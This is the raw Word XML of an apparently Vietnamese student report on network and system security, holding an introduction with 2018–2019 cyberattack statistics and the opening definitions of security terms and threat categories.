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2131" w14:textId="5C6EB2EB" w:rsidR="002B6DDA" w:rsidRPr="00C73388" w:rsidRDefault="00D163B1" w:rsidP="00E86046">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">LỜI </w:t>
      </w:r>
      <w:r w:rsidR="00EB71D7" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>MỞ ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDC974" w14:textId="77777777" w:rsidR="009128A7" w:rsidRPr="00C73388" w:rsidRDefault="009128A7" w:rsidP="009128A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64127E0E" w14:textId="14B28B21" w:rsidR="006464B6" w:rsidRPr="00C73388" w:rsidRDefault="006464B6"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Những năm gần đây, trong xu thế của cuộc cách mạng công nghiệp 4.0, cùng với việc CNTT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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347ABCBF" w14:textId="77777777" w:rsidR="006464B6" w:rsidRPr="00C73388" w:rsidRDefault="006464B6" w:rsidP="00551A48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BEBFCD" w14:textId="77777777" w:rsidR="00551A48" w:rsidRPr="00C73388" w:rsidRDefault="00551A48"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Cũng trong tháng đầu tiên năm 2019, hệ thống của Trung tâm đã ghi nhận 1.025.104 địa chỉ IP của Việt Nam thường xuyên nằm trong các mạng máy tính ma (botnet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D0D53F" w14:textId="77777777" w:rsidR="00551A48" w:rsidRPr="00C73388" w:rsidRDefault="00551A48" w:rsidP="00551A48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045402C9" w14:textId="1E918717" w:rsidR="00551A48" w:rsidRPr="00C73388" w:rsidRDefault="00551A48"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Trước đó, theo số liệu từ Trung tâm Giám sát an toàn không gian mạng quốc gia, năm 2018, có 10.220 cuộc tấn công mạng vào các hệ thống thông tin tại Việt Nam, giảm 1.023 cuộc so với năm 2017 (tương đương 10%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70605E47" w14:textId="77777777" w:rsidR="00E472E5" w:rsidRPr="00C73388" w:rsidRDefault="00E472E5" w:rsidP="009128A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5DF42F" w14:textId="09C16F72" w:rsidR="00551A48" w:rsidRPr="00C73388" w:rsidRDefault="00551A48" w:rsidP="009128A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Trong đó có 5.932 cuộc tấn công lừa đảo, 3.198 cuộc tấn công thay đổi giao diện và 1.090 cuộc tấn công cài cắm mã độc. Cuối năm 2018, sau khi Bộ TT&amp;TT phối hợp với các một số Bộ, ngành, địa phương và các doanh nghiệp tiến hành rà soát, bóc gỡ mã độc, số lượng địa chỉ IP Việt Nam nằm trong mạng máy tính ma đã giảm khoảng 6% so với năm 2017, còn trên 4.181.000 địa chỉ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD239B" w14:textId="77777777" w:rsidR="00551A48" w:rsidRPr="00C73388" w:rsidRDefault="00551A48" w:rsidP="009128A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57492A88" w14:textId="7855F2F2" w:rsidR="009128A7" w:rsidRPr="00C73388" w:rsidRDefault="00E472E5" w:rsidP="009128A7">
      <w:pPr>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Năm </w:t>
      </w:r>
      <w:r w:rsidR="009128A7" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>2019 trong Quý này có 620 cuộc tấn công mạng nhằm vào các hệ thống thông tin ở Việt Nam.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dựa vào việc khai thác các lỗ hổng thông tin, lừa đảo trên mạng xã hội và đánh cắp thông tin khách hàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370292C1" w14:textId="77777777" w:rsidR="009128A7" w:rsidRPr="00C73388" w:rsidRDefault="009128A7" w:rsidP="009128A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B7B315" w14:textId="77777777" w:rsidR="00551A48" w:rsidRPr="00C73388" w:rsidRDefault="00551A48" w:rsidP="00551A48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Trend Micro, công ty dẫn đầu trong các giải pháp an ninh mạng, hôm nay đã công bố Báo cáo dự đoán tình hình hiểm họa năm 2019, cảnh báo rằng sẽ có các phương thức tấn công an ninh mạng tinh vi hơn trong năm 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F426F60" w14:textId="77777777" w:rsidR="00551A48" w:rsidRPr="00C73388" w:rsidRDefault="00551A48" w:rsidP="009128A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2ECDBC" w14:textId="6AE67684" w:rsidR="00042991" w:rsidRPr="00C73388" w:rsidRDefault="00E472E5" w:rsidP="00042991">
      <w:pPr>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Từ trước đến </w:t>
      </w:r>
      <w:r w:rsidR="00042991" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">nay vấn đề bảo mật trong mạng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">luôn là vấn đề cấp thiết </w:t>
      </w:r>
      <w:r w:rsidR="00042991" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>. Công nghệ càng</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00042991" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>phát triển nhu cầu sử dụng trao đổi thông tin qua mạng càng nhiều và trở nên</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00042991" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tất yếu. Cũng vì vậy mà các tài nguyên, dữ liệu rất rất bị rò rỉ và đánh cắp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00042991" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D8FFB" w14:textId="77777777" w:rsidR="00E472E5" w:rsidRPr="00C73388" w:rsidRDefault="00E472E5" w:rsidP="00042991">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E69448E" w14:textId="0EDEED33" w:rsidR="00E472E5" w:rsidRPr="00C73388" w:rsidRDefault="00E472E5" w:rsidP="00042991">
      <w:pPr>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Việc tấn công các hổng đánh cắp thông tin của nạn nhân càng ngày càng tinh vinh thì việc </w:t>
      </w:r>
      <w:r w:rsidR="00D716A5" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tìm kiếm lỗ hổng bảo mật từng ngày được hoàn thiện hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55613FF1" w14:textId="77777777" w:rsidR="00D716A5" w:rsidRPr="00C73388" w:rsidRDefault="00D716A5" w:rsidP="00042991">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193E7F8B" w14:textId="1505EC7D" w:rsidR="00D327FB" w:rsidRDefault="00D327FB" w:rsidP="0004299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F4E372D" w14:textId="77777777" w:rsidR="00D716A5" w:rsidRPr="00C73388" w:rsidRDefault="00D716A5" w:rsidP="00042991">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6198A43D" w14:textId="1DDF97F9" w:rsidR="00E86046" w:rsidRPr="00C73388" w:rsidRDefault="00E86046" w:rsidP="00EB71D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7121C695" w14:textId="77777777" w:rsidR="00C73388" w:rsidRPr="00C73388" w:rsidRDefault="00C73388" w:rsidP="00C73388">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>LỜI CẢM ƠN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381AB799" w14:textId="77777777" w:rsidR="00E86046" w:rsidRPr="00C73388" w:rsidRDefault="00E86046" w:rsidP="00C73388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D5F6FD" w14:textId="0ABA1D35" w:rsidR="00E86046" w:rsidRPr="00C73388" w:rsidRDefault="00E86046" w:rsidP="00E86046">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF29FC" w14:textId="77777777" w:rsidR="00E86046" w:rsidRPr="00C73388" w:rsidRDefault="00E86046">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E60B020" w14:textId="4E5BCEA8" w:rsidR="00E86046" w:rsidRPr="00C73388" w:rsidRDefault="00C73388" w:rsidP="00E86046">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>NHẬN XÉT CỦA GIẢNG VIÊN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E516151" w14:textId="030F21EB" w:rsidR="00E86046" w:rsidRPr="00C73388" w:rsidRDefault="00E86046">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7694DE67" w14:textId="36B49CFF" w:rsidR="00E86046" w:rsidRPr="00C73388" w:rsidRDefault="00E86046" w:rsidP="00E86046">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>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 </w:t>
      </w:r>
      <w:r w:rsidR="008E6BAB" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>TỔNG QUAN VỀ AN NINH MẠNG</w:t>
      </w:r>
      <w:r w:rsidR="00372720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> VÀ AN TOÀN HỆ THỐNG</w:t>
      </w:r>
      <w:r w:rsidR="008E6BAB" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C6969" w14:textId="4386DD7D" w:rsidR="00DE361D" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A" w:rsidP="00E86046">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>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E86046" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>1. Bảo mật thông tin là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476199FD" w14:textId="3C466BA5" w:rsidR="00E86046" w:rsidRPr="00C73388" w:rsidRDefault="00DE361D" w:rsidP="00DE361D">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Bảo mật là sự hạn chế khả năng lạm dụng tài nguyên và tài sản. Bảo mật trở nên đặc biệt phức tạp trong quản lý, vận hành những hệ thống thông tin có sử dụng các công cụ tin học, nơi có thể xảy ra và lan tràn nhanh chóng việc lạm dụng tài nguyên (các thông tin di chuyển vô hình trên mạng hoặc lưu trữ hữu hình trong các vật liệu) và lạm dụng tài sản (các máy tính, thiết bị mạng, thiết bị ngoại vi, các phần mềm của cơ quan hoặc người sở hữu hệ thống). Hạn chế ở đây có ý rằng không thể triệt phá hết ngay việc lạm dụng, cho nên cần sẵn sàng đề phòng mọi khả năng xấu với các phương cách thích hợp và chuẩn bị xử lý các sự cố nếu có việc lạm dụng xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C840857" w14:textId="77777777" w:rsidR="00532F1E" w:rsidRPr="00C73388" w:rsidRDefault="00532F1E" w:rsidP="00DE361D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658F56BB" w14:textId="20803A7E" w:rsidR="00554E62" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A" w:rsidP="00F77941">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1454E" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>2. An ninh mạng là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF08930" w14:textId="32BBB158" w:rsidR="0011454E" w:rsidRPr="00C73388" w:rsidRDefault="00D666EB" w:rsidP="00F77941">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554E62" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>An ninh mạng (cybersecurity), an ninh máy tính (computer security), bảo mật công nghệ thông tin (IT security) hay an ninh mạng máy tính là việc bảo vệ hệ thống mạng máy tính từ các hành vi trộm cắp hoặc làm hư hỏng phần cứng, phần mềm hoặc các dữ liệu, cũng như từ sự gián đoạn hoặc chuyển lạc hướng của các dịch vụ được cung cấp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84E47F" w14:textId="77777777" w:rsidR="00DE361D" w:rsidRPr="00C73388" w:rsidRDefault="00DE361D" w:rsidP="001C5905">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D34530A" w14:textId="7D4F6806" w:rsidR="00B45C13" w:rsidRDefault="00B45C13" w:rsidP="001C590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241540" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Network Security sẽ bảo vệ chống lại mọi hoạt động tấn công mạng từ phía bên trong và phía bên ngoài . Đó có thể là hành vi tấn công vào hệ thống an ninh mạng của công ty từ những nhân viên hoặc người lạ sử dụng usb của nhân viên trong công ty và biết được mật khẩu của nhân viên trong công ty, sau đó thực hiện hành vi tấn công. Hoặc có những trường hợp tin tặc sẽ tấn công từ bên ngoài tường lửa của doanh nghiệp của bạn. Một hệ thống an ninh hiệu quả sẽ giám sát tất cả các hoạt động mạng, cảnh báo về những hành động vi phạm trái phép và thực hiện những sự thay đổi, ăn cắp dữ liệu… (những hành động trái phép).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F7C5C4" w14:textId="77777777" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="001C5905">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5A729F" w14:textId="7FB0E14C"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 An toàn hệ thống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A499E7" w14:textId="13D08772"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sidRPr="00DE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>An toàn hệ thống (Security) Bảo vệ hệ thống (protection) là một cơ chế kiểm soát việc sử dụng tài nguyên của các tiến trình hay người sử dụng để đối phó với các tình huống lỗi có thể phát sinh từ trong hệ thống .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8D217" w14:textId="77777777" w:rsidR="00DE57E6" w:rsidRDefault="00DE57E6" w:rsidP="001C5905">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD0A69B" w14:textId="05DBCE5B"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 Các mối đe doạ của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA77260" w14:textId="3896B61C"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Có nhiều tác nhân có thể là mối đe doạ (threat - còn gọi là hiểm hoạ hay mối nguy hại) cho một mạng máy tính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30345835" w14:textId="77777777" w:rsidR="00DE57E6" w:rsidRDefault="00DE57E6" w:rsidP="001C5905">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08D52704" w14:textId="19E2BC8D" w:rsidR="00DE57E6" w:rsidRDefault="00DE57E6" w:rsidP="00DE57E6">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Có thể chia các mối đe doạ (threat) thành các dạng sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382BEE9" w14:textId="77777777" w:rsidR="00DE57E6" w:rsidRDefault="00DE57E6" w:rsidP="00DE57E6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
